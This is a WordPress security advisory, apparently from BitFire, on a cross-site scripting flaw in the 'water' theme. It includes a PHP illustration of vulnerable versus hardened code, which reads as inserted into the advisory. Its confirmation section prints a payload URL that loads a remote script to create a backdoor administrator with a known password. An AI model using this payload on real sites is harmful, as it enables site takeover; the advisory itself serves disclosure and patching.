WordPress water theme allows attackers to gain administrative privileges

On August 6, 2021 BitFire released a cross-site scripting vulnerability for the WordPress water theme. At the time of this writing there are several hundred websites currently using the theme. The flaw stems from several unchecked GET variables that are written into a link tag in the page's <head>. Exploitation can lead to full site compromise.

This flaw allows an attacker to craft a link to the target website that, when clicked by the site administrator, can result in a backdoor administrator account being created on the vulnerable site. The backdoor account could then be used to upload malware to the target site and/or lock the actual site administrator out.

The theme developer could not be reached to create a patch for this issue. The following patch file is provided by BitFire. Download the patched header.php file with this link: header.php, then replace the file wp-content/themes/water/header.php with this patched version.
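To show the class of fix the patch applies, here is a constructed illustration of the bug pattern described above beside its hardened form. This is added example code, not the water theme's actual header.php and not BitFire's patch; the function names, the data-template attribute and the file names and template keys in the allow lists are assumptions.

```php
<?php
// Constructed illustration (not the theme's real code): a GET parameter echoed
// unescaped into a <link> tag in <head>. A value containing '">' closes the
// attribute and the tag, so whatever follows is parsed as new markup.

// VULNERABLE pattern: raw request input written straight into markup.
function water_link_tag_vulnerable() {
    $stylesheet = isset( $_GET['stylesheet'] ) ? $_GET['stylesheet'] : 'style.css';
    $template   = isset( $_GET['template'] ) ? $_GET['template'] : 'default';
    return '<link rel="stylesheet" href="' . get_template_directory_uri() . '/' . $stylesheet
         . '" data-template="' . $template . '">';
}

// HARDENED pattern: unslash, sanitize, validate against a fixed allow list,
// then escape for the exact output context (URL vs. attribute value).
function water_link_tag_hardened() {
    $allowed_sheets    = array( 'style.css', 'dark.css' ); // hypothetical file names
    $allowed_templates = array( 'default', 'wide' );        // hypothetical template keys

    $stylesheet = isset( $_GET['stylesheet'] )
        ? sanitize_file_name( wp_unslash( $_GET['stylesheet'] ) )
        : 'style.css';
    $template = isset( $_GET['template'] )
        ? sanitize_key( wp_unslash( $_GET['template'] ) )
        : 'default';

    // Anything outside the allow list falls back to the safe default.
    if ( ! in_array( $stylesheet, $allowed_sheets, true ) ) {
        $stylesheet = 'style.css';
    }
    if ( ! in_array( $template, $allowed_templates, true ) ) {
        $template = 'default';
    }

    // esc_url() for the href, esc_attr() for every other attribute value;
    // the escaping alone would already neutralise the '">' break-out.
    return '<link rel="stylesheet" href="'
         . esc_url( get_template_directory_uri() . '/' . $stylesheet )
         . '" data-template="' . esc_attr( $template ) . '">';
}
```

The cleanest fix is often to stop reading these GET parameters in the theme at all; where they must be read, the allow list plus context-specific escaping shown here is the minimum.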

Vulnerability confirmation

If your site is vulnerable, you can visit any post (not the homepage) on your site and append the following to that URL:

?preview=true&stylesheet="><script+src=https://bitfire.co/tools/wpadmin.php><&template=z

If your site is vulnerable, a new administrator user named system will be created with the password hacked. Be sure to remove this account afterwards. If the patch is successful, or if your site is running a WordPress firewall, no user account will be created.

BitFire customers are already protected from this and hundreds of other vulnerabilities. Check out our guide to securing your WordPress or other PHP site for instructions on how you can prevent your site from being hacked.

Cory Marsh
Cory Marsh has over 20 years of Internet security experience. He is a lead developer on the BitFire project and regularly releases PHP security and programming videos on BitFire's YouTube channel.
